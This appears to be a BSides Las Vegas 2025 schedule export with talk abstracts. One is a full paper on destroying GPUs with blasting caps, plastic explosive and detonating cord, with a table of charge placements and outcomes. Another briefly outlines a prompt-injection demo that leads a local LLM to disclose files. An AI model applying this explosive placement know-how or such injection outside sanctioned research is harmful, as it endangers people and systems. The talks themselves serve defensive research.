This session is for anyone tired of fixing “critical” vulnerabilities that don’t actually matter while missing the ones that do. Through the lens of financial-sector security, the talk explores how modern frameworks like EPSS, CVSSv4, SSVC, and VEX can be layered together to build a smarter vulnerability management process. Expect real-world examples, sample triage logic, and rollout ideas that won’t break your existing workflows. Whether you're in AppSec, infrastructure, or risk management, you’ll walk away with a better way to prioritize what matters most—and communicate those decisions clearly across teams. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/ZPH8MR/ Florentine F Avinash Nutalapati PUBLISH NV9MUC@@pretalx.com -NV9MUC Thwarting Key Extraction and Supply Chain attacks by Detonating GPUs en en 20250805T140000 20250805T142000 002000

Thwarting Key Extraction and Supply Chain attacks by Detonating GPUs

## Introduction Securing high-value computing hardware against physical tampering has become increasingly critical as the economic and strategic value of these systems continues to rise. Modern AI accelerators and specialized computing hardware often contain sensitive intellectual property, proprietary algorithms, and valuable data that require protection against unauthorized access and reverse engineering. Although software-based security measures such as encryption and authentication provide important layers of defense, they may be insufficient against sophisticated adversaries with physical access to the hardware. The protection of computing hardware against physical attacks has traditionally focused on tamper-evident enclosures, secure boot mechanisms, and cryptographic techniques. However, these approaches have limitations when adversaries have unlimited time to analyze and physically manipulate the hardware. As noted in recent research, if an adversary has sufficient time to image or modify a chip, they can get the design of the chip for replication or further attacks, and pull secrets off the chip as they are stored or while the chip is running. This challenge is particularly relevant in the context of flexible Hardware Hardware Enabled Guarantees (flexHEG), or Hardware Enabled Mechanisms (HEM), which aims to implement hardware-based safety measures for advanced AI systems. FlexHEGs require mechanisms that can reliably enforce policies on high-capability AI systems even when these systems might have incentives to circumvent such controls. Physical security measures that can reliably destroy sensitive hardware components in response to tampering attempts form a critical part of this safety ecosystem. Various approaches to hardware self-destruction have been proposed in the literature, including pyrotechnical microelectromechanical systems (PyroMEMS), nanothermite layers, and other specialized solutions. While these approaches show promise, they often require complex manufacturing processes, specialized materials, and significant research and development investment. These factors can limit their practical deployment in real-world security scenarios where cost-effectiveness and reliability are paramount. In this paper, we propose and evaluate a pragmatic alternative: the use of commercially available detonators, specifically detonators used in the petroleum industry, for rapid and reliable GPU self-destruction. The key advantages of this approach include: * **Availability**: Commercial detonators are readily accessible as standardized industrial components. * **Cost-effectiveness**: At approximately $9 per unit, they have a significantly lower cost than custom-engineered solutions. * **Reliability**: These components have been extensively tested and proven to be reliable in harsh environments such as deep oil and gas wells. * **Implementation simplicity**: The approach requires minimal modification to the existing hardware. * **Effectiveness**: As our experiments demonstrate, they provide sufficient destructive force to irreversibly damage sensitive hardware components. We experimentally validate our approach by integrating standard #6 and #8 detonators within either backside support of a GPU or a modified GPU heatsink and testing its effectiveness in destroying the underlying hardware. Our results demonstrate that this approach provides an effective means of preventing unauthorized access to sensitive hardware components upon detection of tampering. This work contributes to the broader field of hardware security by providing a practical, immediately deployable solution for physical security in high-value computing environments, particularly those involving AI accelerators and other specialized computing hardware that may require protection against sophisticated physical attacks. This work may also provide protection for supply chain attacks by allowing high-value chips to be packaged at the point of manufacture with an active tamper sensor and this response mechanism to destroy the chip in any tamper or key extraction attempt. ## Methodology Our research methodology focused on developing and testing a practical approach to GPU self-destruction using commercially available and accessible products. The primary objective was to identify the smallest effective mechanism that could reliably destroy a GPU while minimizing collateral damage to surrounding components and anyone handling the GPU. ### Commercial Detonators We experimented with #6, #8 blasting caps (detonators) on the basis of their commercial availability and reliability. This detonator approach was selected over custom-engineered solutions such as PyroMEMS or specialized nanothermite implementations for several reasons: 1. **Commercial availability**: The detonator is a standardized industrial component that can be procured without requiring custom manufacturing. 2. **Cost-effectiveness**: At presents a significantly lower cost than custom-engineered solutions. 3. **Reliability**: Detonators has been extensively tested and proven reliable in harsh environments, including high-temperature conditions typical of server environments. 4. **Electrical characteristics**: The detonator can be reliably activated with standard electrical currents while providing good tolerance against accidental activation from stray currents. 5. **Physical characteristics**: The compact size allows for integration within standard GPU heatsinks with minimal modification. We experimentally validate our approach by integrating standard #6 and #8 detonators within either backside support of a GPU or a modified GPU heatsink and testing its effectiveness in destroying the underlying hardware. Our results demonstrate that this approach provides an effective means of preventing unauthorized access to sensitive hardware components upon detection of tampering. This work contributes to the broader field of hardware security by providing a practical, immediately deployable solution for physical security in high-value computing environments, particularly those involving AI accelerators and other specialized computing hardware that may require protection against sophisticated physical attacks. This work may also provide protection for supply chain attacks by allowing high-value chips to be packaged at the point of manufacture with an active tamper sensor and this response mechanism to destroy the chip in any tamper or key extraction attempt. Our research methodology focused on developing and testing a practical approach to GPU self-destruction using commercially available and accessible products. The primary objective was to identify the smallest effective mechanism that could reliably destroy a GPU while minimizing collateral damage to surrounding components and anyone handling the GPU. # Experimental Setup and Results We experimented with #6, #8 blasting caps (detonators) on the basis of their commercial availability and reliability. This detonator approach was selected over custom-engineered solutions such as PyroMEMS or specialized nanothermite implementations for several reasons: 1. **Commercial availability**: The detonator is a standardized industrial component that can be procured without requiring custom manufacturing. 2. **Cost-effectiveness**: At presents a significantly lower cost than custom-engineered solutions. 3. **Reliability**: Detonators has been extensively tested and proven reliable in harsh environments, including high-temperature conditions typical of server environments. 4. **Electrical characteristics**: The detonator can be reliably activated with standard electrical currents while providing good tolerance against accidental activation from stray currents. 5. **Physical characteristics**: The compact size allows for integration within standard GPU heatsinks with minimal modification. ## Experimental Setup Our experimental setup consisted of the following components: 1. **Test GPU**: NVDIA P100, a representative high-performance computing accelerator similar to those used in AI training and inference systems. 2. **Modified heatsink**: The standard GPU heatsink was modified to accommodate the detonator by drilling a precisely sized hole at a strategic location above critical GPU components. 3. **Detonator mounting**: The detonator was securely mounted at various orientations seen in Table 1; below the backside support bracket in plane with the bracket, below the backside support bracket perpendicular to the GPU die directing the blast towrards the GPU, or Within the modified heatsink, positioned to direct the destructive force toward the GPU die and memory components. 4. **Initiation**: #6 detonators were initiated with safety fuse, #8 detonators were initiated with a standard electrical ignition circuit. For safety and regulatory compliance, all experiments were conducted in appropriate facilities with necessary federal, state and local permits and under the supervision of licensed and trained personnel of ACCX Research, Fullerton, CA. ## Results Our experimental results demonstrate that commercial detonators, can effectively destroy GPU hardware in a controlled manner, rendering sensitive components irretrievable when tampering is detected. ### Detonator Effectiveness Either detonator was found to be capable of reliably destroying critical GPU components. When properly positioned within the modified heatsink, the detonator generated sufficient force to physically fracture the GPU die, rendering the processor inoperable, and in most cases pulverize the die making any analysis difficult. ## Table 1: GPU destruction tests using various detonators and setups | Test # | Detonator/Explosive | Setup Description | Outcome | |--------|---------------------|-------------------|---------| | 1 | #6 Blasting Cap | No heatsink; blasting cap placed under GPU | chip dislodged | | 2 | #6 Blasting Cap | With heatsink; blasting cap under GPU | chip intact | | 3 | #6 Blasting Cap (vertical) | Cap placed vertically, GPU on heatsink, setup buried in sand | chip pulverized; heatsink dented | | 4 | 2gram of C2 Detasheet | plastic explosives + 6" 25-grain detonating cord to initiate | direct application; GPU destroyed | | 5 | 5 inches of 18-grain detcord (~100mg) | Applied to chip area | chip dislodged and shattered | | 6 | #8 Detonator | Applied directly to GPU | Unclear/ineffective | | 7 | #8 Detonator | Placed vertically on top of GPU heatsink | No destruction; ineffective | | 8 | #8 Detonator | Placed in a hole drilled through heatsink layers and onto copper plate | GPU pulverized | ## Discussion The use of commercial detonators for GPU protection offers several practical advantages over alternative approaches. They have a proven track record spanning decades and robust manufacturing quality control. This significantly reduces the implementation complexity and time-to-deployment for organizations seeking to enhance their hardware security posture. The approach is also scalable to different sizes and types of computing hardware. While our experiments focused on GPUs, the same principles could be applied to other high-value computing components such as CPUs, FPGA accelerators, or custom ASIC designs. The key considerations would be selecting an appropriately sized detonator and optimizing its placement to ensure effective destruction of critical components. The approach is also suitable for use in secure memory or SSD applications, as well as data destruction devices triggered with walk-away or power-on-without-key. ### Regulatory and Safety Considerations The use of detonators for hardware protection raises important regulatory and safety considerations that must be addressed in any practical implementation. Organizations implementing this approach would need to ensure compliance with relevant regulations, which may include: * Obtaining appropriate permits for storing and handling detonators * Implementing proper safety protocols for installation and maintenance * Testing the completed assemblies for compliance with shipping regulations and obtaining the necessary permits and classifications * Training personnel in safe handling procedures * Development of appropriate containment to maximize safety, even during deliberate tampering attempts * Establishing protocols for disposal of protected hardware Future work would include building and certifying containment mechanisms for use and transport without a license or special handling. Certified products could resemble a self-contained, tamper responsive heatsink/backplate/case enclosing the protected chip(s) and are manufactured and certified as a unit that can be safely handled and pass transportation tests. The design maturity at which this technology is safe to handle and install in typical computer environments would be naturally sufficient to pass such assessments. These regulatory considerations may vary significantly by jurisdiction, and organizations would need to assess the specific requirements applicable to their operating environments. ## Conclusion In this paper, we have presented a practical approach to hardware security for high-value computing components using commercial detonators for rapid and reliable physical destruction. Our experimental results demonstrate that a detonator, when properly integrated into a modified GPU heatsink, provides effective protection against unauthorized access to sensitive hardware components. The primary advantages of our approach include: * **Practicality**: Using commercially available components rather than custom-engineered solutions * **Cost-effectiveness**: Significantly lower cost than specialized PyroMEMS or nanothermite approaches * **Reliability**: Proven performance in harsh environments * **Implementation simplicity**: Minimal modification to existing hardware * **Effectiveness**: Demonstrated ability to irreversibly destroy sensitive components Our work contributes to the broader field of hardware security by providing a readily deployable solution for organizations seeking to protect high-value computing assets against sophisticated physical attacks. It is particularly relevant in the context of emerging AI safety and governance frameworks such as FlexHEG, where reliable hardware-based safety mechanisms are essential. Although software-based protection mechanisms such as zeroization play an important role in a layered security approach, physical destruction provides a last line of defense against sophisticated supply chain manipulation or laser key extraction. The approach we have demonstrated offers a balance of effectiveness, cost, reliability, and implementation simplicity that makes it suitable for immediate deployment in secure computing environments. Future work should focus on refining the integration of physical destruction mechanisms with advanced tamper detection systems, exploring regulatory-friendly pathways and alternatives, and extending the approach to a broader range of computing hardware. As AI systems continue to advance in capability and strategic importance, ensuring their physical security will remain a critical challenge, and practical approaches like the one presented in this paper will form an important part of comprehensive security strategies. ## Acknowledgment The author would like to acknowledge the financial support of the Survival and Flourishing Fund, Good Forever Foundation, as well as thank the broader flexHEG community for valuable discussion and feedback. John Norman of ACCX research (Fullerton, CA) consulted and handled all of the explosive work, and Evan Miyazono of Atlas Computing provided invaluable project support. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/NV9MUC/ Florentine F Mehmet Sencan PUBLISH FWHWNV@@pretalx.com -FWHWNV The Art of Concealment: CVE's Challenge with Transparency en en 20250805T143000 20250805T145000 002000

The Art of Concealment: CVE's Challenge with Transparency

In the cybersecurity world, the Common Vulnerabilities and Exposures (CVE) system serves as a cornerstone for understanding and mitigating security threats. However, the process of contributing to and utilizing CVE data is often hindered by issues related to transparency. This talk explores how the CVE community struggles with openness, examining why participants—such as vulnerability researchers, vendors, and users—may sometimes fall short of full disclosure. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/FWHWNV/ Florentine F Jerry Gamblin PUBLISH FXMV3G@@pretalx.com -FXMV3G So... You want to build your own hacking device... en en 20250805T150000 20250805T154500 004500

So... You want to build your own hacking device...

In this presentation, I will delve into the burgeoning world of small hacking devices, such as the Flipper Zero and WiFi Nugget, providing a comparative analysis of popular microcontroller boards like the Raspberry Pi Pico, ESP series, and Arduino. This discussion will explore their functionalities, use cases, specifications, and cost considerations, highlighting the broader implications for security practices. We will also examine programming environments including MicroPython, CircuitPython, Arduino IDE, and C, assessing their advantages and limitations for different types of projects. Further, the session will guide attendees on selecting the right components for their projects, such as WiFi shields, displays, and various sensors, and provide practical advice on assembling these components into functional security tools. The talk aims to empower attendees to enhance their security setups or develop new solutions, providing a roadmap from initial concept to prototype development and eventual production, thereby demystifying the technical complexities and equipping them with the knowledge to effectively utilize these tools in their cyber security endeavors. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/FXMV3G/ Florentine F Alex Thines PUBLISH HVRLVM@@pretalx.com -HVRLVM Dungeons & Dragons: The security tool you didn’t know you needed en en 20250805T170000 20250805T174500 004500

Dungeons & Dragons: The security tool you didn’t know you needed

# Game-Based Learning for Effective Incident Response Training: Beyond Traditional Tabletops This talk explores a revolutionary approach to incident response training that leverages role-playing game mechanics to create engaging, effective learning experiences. Traditional tabletop exercises, while common, often fail to prepare teams for real incidents due to their static nature and participants' reluctance to be fully transparent about organizational vulnerabilities. The foundation of this approach rests on a simple premise: humans learn better when they're having fun. This isn't just intuitive wisdom – it's backed by scientific research. A meta-study of board, tabletop, and analog game-based learning approaches confirms that engagement and enjoyment significantly enhance knowledge retention and application. When we examine why traditional training methods fall short, we find they often create artificial environments where participants worry about protecting their professional reputation rather than honestly assessing security gaps. Real incidents rarely unfold according to plan. They happen at inconvenient times (like Friday afternoons), depend on people who might be unavailable, and involve unexpected complications. Our role-playing framework simulates these realities through game mechanics that introduce unpredictability while fostering collaborative problem-solving. The structure mirrors popular role-playing games like Dungeons & Dragons – a comparison supported by research showing that when such games are played in "inviting, encouraging, compassionate, and intellectually engaged environments," they create powerful learning opportunities. Each session is guided by an Incident Master who serves as both storyteller and authority on scenario progression. Participants embody stereotypical characters with defined personality traits and modifiers that affect their interactions. For instance, a Microsoft system administrator might have a bias toward Windows solutions and a negative modifier to likability, while a help desk supporter might have enhanced communication skills. These character archetypes add both humor and realism to the scenarios, encouraging participants to step outside their usual perspectives. The gameplay follows a three-round structure, typically beginning at the worst possible moment – late Friday afternoon – and progressing through different phases of the incident. Each participant has two actions per round, and outcomes are determined through dice rolls that simulate real-world unpredictability. This mechanic forces teams to develop contingency plans when their initial approaches fail, just as they would in actual incidents. What sets this approach apart from traditional exercises is the psychological safety it creates. By framing the activity as a game rather than a test or evaluation, participants feel free to experiment with approaches, admit knowledge gaps, and honestly discuss organizational vulnerabilities without fear of professional consequences. This honesty is crucial for effective incident response preparation. The framework's applications extend well beyond security incidents. Organizations can use it to teach abstract security concepts like Identity and Access Management or Zero Trust principles through concrete scenarios. Sales and marketing teams can gain technical understanding by experiencing incidents firsthand. Product teams can demonstrate functionality in realistic contexts. The approach scales from individual to team-based exercises and can be customized to address specific learning objectives. The open-source nature of this framework makes it accessible to organizations of all sizes. All characters, scenarios, and guidance materials are available on GitHub as markdown files, allowing security teams to implement and customize the approach without significant investment. From a compliance perspective, this approach offers substantial advantages over traditional methods. Many regulatory frameworks require organizations to conduct regular incident response training. Rather than treating this as a checkbox exercise, the role-playing approach transforms compliance activities into engaging, memorable experiences that produce measurable learning outcomes. The speaker's experience implementing this methodology has revealed several key insights. First, the Incident Master role requires both broad security knowledge and the ability to think dynamically as scenarios unfold in unexpected directions. While previous experience as a Dungeon Master in role-playing games is helpful, it's not essential. Second, scenarios should remain open-ended to simulate the unpredictability of actual incidents. Finally, the Incident Master must carefully calibrate difficulty to maintain the optimal learning zone – challenging enough to require creative thinking but not so difficult that participants become frustrated. This approach recognizes that human minds are not meant to function in isolation. They're "plug-and-play devices" designed to operate in networks, and games provide a structured environment for leveraging collective intelligence. By embracing this reality rather than fighting against it, organizations can transform incident response training from a dreaded obligation into an anticipated opportunity for team building and skill development. In summary, this game-based learning approach represents a paradigm shift in security training methodology. It addresses the fundamental limitations of traditional exercises by creating psychologically safe environments where honest assessment, creative problem-solving, and team collaboration flourish. By making incident response training engaging and enjoyable, organizations not only satisfy compliance requirements but also build genuinely resilient security cultures prepared to face real-world challenges. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/HVRLVM/ Florentine F Klaus Agnoletti Glen Sorensen PUBLISH JJUSHH@@pretalx.com -JJUSHH Keeping Our History Alive: The Hacker’s Guide to Sticker Preservation en en 20250805T180000 20250805T182000 002000

Keeping Our History Alive: The Hacker’s Guide to Sticker Preservation

Hi board! This talk came from a conversation at RE//verse con in February where people admitted using old laptops because they didn't want to lose their laptop stickers. Online guides were for sticker removal but not retention. I promised to find some solutions and make it public. The two sides to this talk are the culture of stickers and the actual how-to of reapplication. They'll likely be 50/50 on time for 20 mins. And lots of pictures throughout. There are many ways to approach the culture side. I want to hit on: * general interest side (offsec, dfir, networking, etc. "There's no place like 127.0.0.1") * specific stances (IDA Pro "No undo, no surrender") * political statements ("Make Malware Great Again!") * the Scene (BSides logos, DEFCON, LUGs, other cons) * just fun ("Five Eyes: Backdoors and Spies") For tech side I've already started buying chemicals and equipment: * Heat guns * questionable ways - WD-40, Goo Gone, Acetone * Still underway - Heptane, VOC compliant Heptane alternatives, Un-Du, drawing gum * Techniques - How to separate between adhesive and laptop and not between vinyl and adhesive. Dangers of razor blades. Safety third * Readhesion - How to not lose the glue but if you do how to appropriately add more I plan on continuing the research between now and the con. I've done enough work to know the good and bad ways, but now want to explore variations on them. I'm trying to find someone to sacrifice a laptop to let me test the limits of burning into the screen. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/JJUSHH/ Florentine F Brian Baskin PUBLISH Z3YUJW@@pretalx.com -Z3YUJW The Not So Boring Threat Model of CSP-Managed NHI’s en en 20250805T183000 20250805T185000 002000

The Not So Boring Threat Model of CSP-Managed NHI’s

This presentation provides a focused examination of a critical risk area across all three major cloud providers: their implementations of CSP-managed Machine Identities. Specifically, we will delve into AWS Service-Linked Roles, Google-managed Service Agents, and Microsoft First-Party Applications. Drawing upon my extensive experience in Cloud, Cloud Security, and, at its most niche, Cloud Security Identity, this talk will be structured around specific, known vulnerabilities and potential exploitation vectors inherent in each cloud's implementation of these CSP-managed identities. This will move beyond theoretical risks to highlight concrete issues. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/Z3YUJW/ Florentine F Kat Traxler PUBLISH ADBAVR@@pretalx.com -ADBAVR Harnessing AI and Post-Quantum Cryptography for Cybersecurity in the Quantum Era en en 20250805T100000 20250805T102500 002500

Harnessing AI and Post-Quantum Cryptography for Cybersecurity in the Quantum Era

Over the past two months, I have focused on researching how Artificial Intelligence (AI) can address the challenges posed by advances in quantum cryptography. As quantum computing evolves, encryption methods and identity tokens face increasing risks, with adversaries potentially breaking encryption much faster. AI provides an efficient solution by enabling quicker detection of attacks and allowing cryptographic systems to adapt in real-time. My research has explored several AI techniques for detecting quantum-related attacks, including Isolation Forest, K-Nearest Neighbors from Scikit-learn, H2O's Isolation Forest and Deep Learning models, as well as PyOD and Autoencoder-based Anomaly Detection from TensorFlow. These methods have been evaluated for their effectiveness in identifying data exfiltration and credential theft, which are often early indicators of a "Harvest Now, Decrypt Later" attack. A "Harvest Now, Decrypt Later" attack involves attackers silently exfiltrating encrypted data now with the intent to decrypt it later when quantum computers can break current cryptographic systems. This attack is characterized by subtle, persistent data exfiltration, often during off-peak hours, and the targeting of highly sensitive data, such as passwords or private keys, without immediate decryption. The absence of immediate fraudulent activity or ransom demands, coupled with the use of weak cryptographic algorithms (e.g., RSA, ECC), can indicate a "Harvest Now, Decrypt Later" attack. To defend against such threats, it is critical to monitor unusual access patterns, transition to quantum-resistant cryptographic systems, and implement advanced strategies like Quantum Key Distribution, Secure Multiparty Computation, and Fully Homomorphic Encryption. In my session, I will delve into methods for enhancing protection against post-quantum attacks, discussing the implementation of quantum-resistant encryption mechanisms such as Machine Learning-based Key Encapsulation, Machine Learning-based Digital Signature Algorithm, and Symmetric-Lattice-based Hybrid Digital Signature Algorithm. These technologies offer robust solutions to safeguard data from emerging quantum cryptographic risks. Tools: https://scikit-learn.org/stable/modules/neighbors.html https://docs.h2o.ai/h2o/latest-stable/h2o-docs/data-science/if.html References https://github.com/QNLab-USTC/Key-Management-and-Service-Framework-for-QKD-Networks https://github.com/h2oai/h2o-tutorials/blob/master/tutorials/isolation-forest/isolation-forest.ipynb Papers: https://cds.cern.ch/record/2723971/files/2005.01598.pdf https://medium.com/@weidagang/demystifying-anomaly-detection-with-autoencoder-neural-networks-1e235840d879 https://postquantum.com/post-quantum/pqc-quantum-ai-qai/ https://postquantum.com/quantum-ai/quantum-ai-qai/ PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/ADBAVR/ Firenze Natalia Semenova Anushka Khare PUBLISH CUL8P9@@pretalx.com -CUL8P9 Desktop Applications: Yes, We Still Exist in the Era of AI!!! en en 20250805T103000 20250805T105500 002500

Desktop Applications: Yes, We Still Exist in the Era of AI!!!

In today’s rush toward AI-native development, desktop applications are often dismissed as legacy systems. However, they remain foundational to industries like design, finance, healthcare, and engineering. These applications are evolving too—embedding local LLMs, enabling predictive UIs, and offering offline AI inference. But in doing so, they create a new category of hybrid software: traditional desktop logic combined with AI decision-making. This evolution introduces a unique and largely under-explored threat landscape. This talk reframes the AI security conversation around the desktop domain. It starts by cataloging AI use cases already embedded in modern desktop applications—intelligent assistants, context-aware automation, AI-enhanced plugins, and model-influenced file parsing. With this foundation, we’ll explore the novel risks they bring, including: * Prompt injection in offline or locally-embedded LLMs. * Inference-based abuse, where untrusted inputs manipulate model behavior. * Unsafe output handling, where AI-generated content drives downstream actions. * AI plugin ecosystems prone to over-permissioning or unvalidated extensions. * Model tampering, especially in scenarios without strong integrity checks. But these new threats don’t replace the old—they amplify them. Traditional issues such as memory corruption, unsafe file parsing, and protocol vulnerabilities remain present, and in some cases, are re-exposed by AI-powered workflows (e.g., previewing or auto-parsing files without validation). To demonstrate this hybrid risk model, the session includes two practical demos: 1. A prompt injection attack targeting an embedded local LLM in a desktop app, leading to unintended file disclosure or unauthorized automation. 2. A file-format fuzzing demo against a legacy parser now wrapped in AI functionality, resulting in a crash or memory corruption—highlighting the dangers of blindly coupling AI with legacy input handling. We’ll then transition into modern threat modeling for these AI-desktop hybrids. We'll break down: * How to model trust boundaries when inference engines are embedded locally. * Risks introduced by model updates or user-controlled configuration. * Edge cases like AI-driven plugin behavior and adversarial content generation. From a defense perspective, we’ll provide fuzzing strategies that remain effective—file format fuzzing, protocol fuzzing, and model I/O fuzzing—along with examples of tools like AFL++, libFuzzer, and custom harnesses for AI pipelines. Finally, we’ll outline how to bring this into the Secure Development Lifecycle (SDLC): * Introduce abuse-case testing for AI features. * Incorporate threat modeling sessions into early feature design. * Automate fuzzing pipelines into CI for both legacy and AI logic. * Develop organizational awareness around the risks of hybrid systems. This session is ideal for security engineers, red teamers, and AppSec practitioners who want a deeper understanding of how the AI transformation impacts a class of software that hasn’t gone anywhere—but is becoming more complex and critical than ever. Expect actionable insights, demo-driven examples, and a modernized approach to defending desktop applications in the AI era. PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/CUL8P9/ Firenze Uday Bhaskar Seelamantula Elizabeth R Rasnick PUBLISH DD8DUT@@pretalx.com -DD8DUT Security Theater, Now Playing: When Security Is a Sideshow Instead of a Strategy en en 20250805T110000 20250805T112500 002500

Security Theater, Now Playing: When Security Is a Sideshow Instead of a Strategy

Security programs built on frameworks, checklists, and best practices can look great on paper—but without a deep understanding of the product and the business, they often fail to drive real outcomes. At best, they create friction. At worst, they create risk where there was none. In this talk, I’ll share my journey inheriting a security program at a fast-paced fintech startup that was built entirely through the lens of compliance—without aligning to how the product worked or how the company actually made money. Security was seen as a service function, not a partner. Trust was low, leadership was in flux, and teams carried “security trauma” from past engagements from previous companies. Through real examples and hard lessons, I’ll walk through how we started turning things around by asking better questions, building fluency in the business, and rethinking what effective security looks like. I’ll cover: - How misunderstanding the product led us to focus on the wrong risks - Key questions we started asking product, engineering, and leadership - Tactical strategies for embedding security into the development lifecycle without slowing teams down - How we shifted our posture from service provider to strategic enabler - How AI and automation gave us back time and influence when headcount wasn’t an option This talk blends storytelling, leadership lessons, and practical takeaways. It's designed for anyone trying to build or mature a security program in an environment with limited resources, unclear ownership, or complex dynamics. If you’re tired of playing defense in the dark—or struggling to get buy-in from teams that don’t trust you—this talk will give you a new lens and real strategies for making security work with the business, not just alongside it. PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/DD8DUT/ Firenze Vanessa Redman Mia Kralowetz PUBLISH 9EAAT8@@pretalx.com -9EAAT8 Shorts Begone: Modding YouTube on iOS (without jailbreaking) en en 20250805T140000 20250805T142500 002500

Shorts Begone: Modding YouTube on iOS (without jailbreaking)

I was wasting far too much time mindlessly scrolling through YouTube Shorts—especially the black hole that is clips from Suits. After watching a few of Bryce Bostwick’s videos on YouTube, I was inspired to take matters into my own hands and figure out how I could rip out all short-form content entirely. After a few days of haxxing, I managed to do just that. This talk is a practical guide I wish I’d had when starting out—an introduction to practical iOS reverse engineering for beginners. What I found was that most online resources on iOS reverse engineering assume you have a jailbroken device you can simply connect to via GDB. That’s what makes this interesting to me—I added the constraint of doing everything on a non-jailbroken device. This talk will briefly explore the history of iOS reverse engineering and then move into practical techniques like: * Dynamic Analysis with Frida: How to hook into iOS apps at runtime, inspect function calls, and modify behaviour on the fly * Method Swizzling: Overriding Objective-C/Swift methods to change how apps function without modifying binaries * FLEX – In-app debugging and exploration * Theos and Tweak Development PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/9EAAT8/ Firenze MasterChen Navan PUBLISH RU39RL@@pretalx.com -RU39RL Unawakened Wakeup: A Novel PHP Object Injection Technique to Bypass __wakeup() en en 20250805T143000 20250805T145500 002500

Unawakened Wakeup: A Novel PHP Object Injection Technique to Bypass __wakeup()

This bypass was conceived about 5 years ago when I tried to hack an Neos Flow application in our business. At the time, I was a novice in POI, but the change of mindset allowed me to build the bypass technique. I am currently out of the field due to a change in my life stage, but I am challenging the CFP to prove that everyone can create opportunities to present their research even if they are out of the field. This content has been presented at m0leCon this year, a security conference organized by the CTF team "pwnthem0le" and "Politecnico di Torino", the oldest politechnic university in Italy. The presentation covered an introduction to PHP Object Injection, explained how POP gadgets are mitigated by overriding `__wakeup()`, and demonstrated how to bypass the mitigation to revive the Guzzle/RCE1 gadget. It was the first technical presentation for me and some subjects and regrets have remained. So I would like to improve my in-English presentation skill at Proving Ground in Security BSides Las Vegas 2025. PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/RU39RL/ Firenze Mat Saulnier Hiroki Matsukuma PUBLISH SWPNGK@@pretalx.com -SWPNGK Boost Your Career: Get Practical InfoSec Experience in Your Community! en en 20250805T150000 20250805T152500 002500

Boost Your Career: Get Practical InfoSec Experience in Your Community!

After feeling lost in roles that didn’t fulfill me, I took some time to reflect on how to create change in my life. With a longstanding interest in security and a concern for the lack of knowledge many people have about safe internet browsing, I decided to immerse myself in this field. Fortunately, I discovered a club dedicated to helping low-income students in the community gain internet access, enabling them to compete with their classmates in terms of information and knowledge. From my very first meeting, I knew I had found something that would truly fulfill me. I was later elected President of the club, where I not only assist students but also manage tasks such as loading open-source software on desktops and troubleshooting bugs in our systems. This role has allowed me to streamline our processes while honing my professional skills. During this talk I would like to share my passion for open source and giving back to others in true open source fashion. I am eager to share my experiences and inspire others to seek hands-on opportunities that enable them to develop skills while making a positive impact in their communities. Last year this topic was mentioned at I am the Calvary during a talk done by Ira Victor, throughout the rest of the conference we had many people come up and talk to us about how to get more involved. Not only would I have a mentor from Proving Grounds but also have the assistance of an infosec and DFIR expert who was a previous BSides speaker, to also help mentor me with this talk. PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/SWPNGK/ Firenze Mea Clift Ashley Cihak PUBLISH HZTYYL@@pretalx.com -HZTYYL Let's Go Shopping: Third-Party Vendors and CyberRisk en en 20250805T153000 20250805T155500 002500

Let's Go Shopping: Third-Party Vendors and CyberRisk

We engage in third-party risk management (TPRM) on a weekly, if not daily, basis through various activities such as shopping for clothes, toys, and food. This talk will explore the analogy of a grocery store to better understand how we practice TPRM in our daily lives and how this can serve as a foundation for robust cyber hygiene. Key terms and concepts that will be visited in this talk are the Criticality of a Vendor, the Inherent Risk of a Vendor, and what considerations may affect these two variables. The talk will go through the different aisles of a grocery store to see how we vet our shopping cart: *Stationary *Food *Flowers *Etc. The conclusion of this talk will emphasize using our everyday shopping habits as a model for effective TPRM. This approach aims to empower attendees in their role in cybersecurity, highlighting the importance of individual contributions to the overall security framework. PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/HZTYYL/ Firenze Meghan Jacquot Rafael Ayala PUBLISH TRVZRS@@pretalx.com -TRVZRS Malicious Packages - they're gonna get ya! en en 20250805T173000 20250805T175500 002500

Malicious Packages - they're gonna get ya!

Over the past few years as a developer and then a security engineer, I've been tasked with upgrading packages due to vulnerabilities countless times, and more recently implemented tooling to detect these vulnerabilities. Throughout this work, one subset of vulnerable packages has really stood out to me - malicious packages. They come in many different shapes and sizes. Their risks appear when adding new packages, or when updating existing packages previously thought to be safe. This talk will discuss what malicious packages do, where they come from, the different types, and the risks associated with them. Examples will be provided for each of the various different types. The recent compromise of xz utils will be given as an example of just how far some attackers will go to compromise legitimate packages. If any other particularly noteworthy examples come up within the next few months, those may be discussed as well. The talk will then discuss different solutions for protecting against these risks. There are many tactics when it comes to new dependencies - reviewing package health, verifying package names, code review / scanning, etc. As well, many companies implement Software Composition Analysis (SCA) tools to detect vulnerable packages. These, however, are insufficient to protect against malicious packages. These tools have an obvious weakness in that they can only catch known malicious packages. They also miss the danger that malicious packages can pose as soon as they're run on a developer's machine, which is often long before any SCA tool will scan them. Malicious packages can also pose a danger in CI/CD pipelines, particularly if they're in testing or build tools ("dev dependencies"), which may run before any SCA tools do(assuming the tool(s) used even scan dev dependencies). Additional protections such as EDR, private package repositories, and package integrity will also be discussed along with their associated weaknesses. In closing, the talk will highlight the need to have multiple layers of defense and remind us that malicious packages are not the only source of supply chain attacks to be vigilant about. PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/TRVZRS/ Firenze Allan Friedman Megg 